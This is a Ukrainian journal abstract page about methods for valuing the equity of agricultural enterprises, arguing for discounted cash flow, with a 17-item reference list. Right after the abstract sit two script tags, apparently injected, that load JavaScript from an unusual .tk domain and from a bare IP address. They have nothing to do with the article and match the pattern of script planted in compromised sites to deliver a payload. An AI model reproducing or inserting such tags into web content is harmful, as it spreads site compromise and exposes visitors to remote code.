ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.14:658.147:631.11
Фінансові відносини та бухгалтерський облік

Оцінка власного капіталу агроформувань / Боднарчук А. В. // Економіка АПК. - 2014. - № 8 - С. 56

Економічний розвиток національної господарської системи в цілому та кожного господарюючого суб'єкта зокрема зумовлюють необхідність формування достовірної, повної й об'єктивної інформації для прийняття ефективних управлінських рішень, на повноту і достовірність якої суттєво впливає оцінка. У дослідженні розглянуто й узагальнено існуючі підходи до оцінки власного капіталу, виділені їхні позитивні та негативні властивості. Доведено, що найвірогідніше визначає достовірну вартість власного капіталу метод дисконтування грошових потоків. Він ураховує недоліки інших методів, що дає можливість виявити фактори впливу на прибутковість підприємства, його інвестиційну привабливість і реально визначити його вартість. Це пов'язано з тим, що різні підприємства, самостійно формуючи облікову політику, можуть або занижувати, або завищувати фінансовий результат, що відображається у звітності. Реальні ж грошові надходження, які одержують підприємства від своєї діяльності, не залежать від специфіки ведення обліку та отриманої величини прибутку. Табл.: 1. Рис.: 2. Бібліогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: оцінка, власний капітал, агроформування, метод, грошові потоки, капіталізація, дивіденди, акція

Список використаних джерел

 1. Бланк И.А. Управление использованием капитала / И.А. Бланк. – К.: «Ника-Центр», 2000. – 656 с.
 2. Бланк И.А. Управление активами и капиталом предприятия / И.А. Бланк. – К.: Ника-Центр; Эльга, 2003. – 448 с. – («Энциклопедия финансового менеджера», вып. 2).
 3. Григорьев В. Оценка предприятия. Имущественный поход / В. Григорьев, И. Островкин. – М.: Дело, 1998. – 98 с.
 4. Єрофєєва Т.А. Підходи до оцінки вартості бізнесу: проблеми їх використання: [зб. наук. праць] / Т.А. Єрофєєва. – 2007. – С. 25-30.
 5. Загальні засади оцінки майна і майнових прав: Національний стандарт № 1 від 10.09.03 р. № 1440 (Із змінами, внесеними згідно з Постановою КМ № 231 від 04.03.2013) [Електроний ресурс] – Режим доступу: // Ліга: еліт Закон Copyright: ІАЦ «Ліга». – 2003 – 2013.
 6. Методичні рекомендації з експертної оцінки майна в підприємствах АПК: [ред. П. Т. Саблук, Г. М. Підлісецький]. – К., 2000. – 98 с.
 7. Перекупнева Т. Оцінка вартості малих та середніх підприємств методом галузевих співвідношень (порівняльний підхід) / Т. Перекупнева // Економіка та держава. – 2005. – № 1. – С. 23-28.
 8. Смирнова Е.В. Инструменты комплексного экономического анализа устойчивого развития предприятия /Е.В. Смирнова, Н. А. Тычинина // Экономический анализ: теория и практика. – 2009. – № 9 (138). – С. 31-37.
 9. Сычева Г.И. Оценка стоимости предприятия (бизнеса) / Г.И. Сычева, Е.Б. Колбачев, В.А. Сычев. – Ростов н/Д: "Феникс", 2003. – 384 с.
 10. Крамаренко Г.О. Фінансовий менеджмент: [підруч.] / Г.О. Крамаренко, О.Є. Чорна. – [2-ге вид.]. – К.: Центр учбової літератури, 2009. – 520 с.
 11. Чубай В.М. Недоліки інструментарію економічного аналізу та шляхи їх усунення: науковий і практичний аспекти / В.М. Чубай // Актуальні проблеми економіки. – 2012. – № 4 (130). – С.277-290.
 12. Ferraz, J.C. and Hamaguchi, N. (2002), “Introduction: M&A and Privatization in Developing Countries – Changing Ownership Structure and Its Impact on Economic Performance” The Developing Economies, Vol. XL-4 (December 2002). – P. 383-399.
 13. Graham, John R., and Campbell R. Harvey. «How do CFOs make capital budgeting and capital structure decisions?» Journal of Applied Corporate Finance 15:1 (2002): 8-23.
 14. Jean Tirole. The Theory of Corporate Finance. – Princeton University Press.
 15. Modigliani, F., Miller, M. (1958) The Cost of Capital, Corporation Financeand the Theory of Investment. American Economic Review. Vol. 48. – P. 267-297.
 16. Perridon L. Finanzwirtschaft der Untenehmen. 10. Aufl. – Munchen: Vahlen, 2008. – Р. 119.
 17. Volkart R. Unternehmensbewertung und Akguisitionen. – Zuricn: versns, 2009. – Р. 62.
Читати статтю: 14_08_56-62.pdf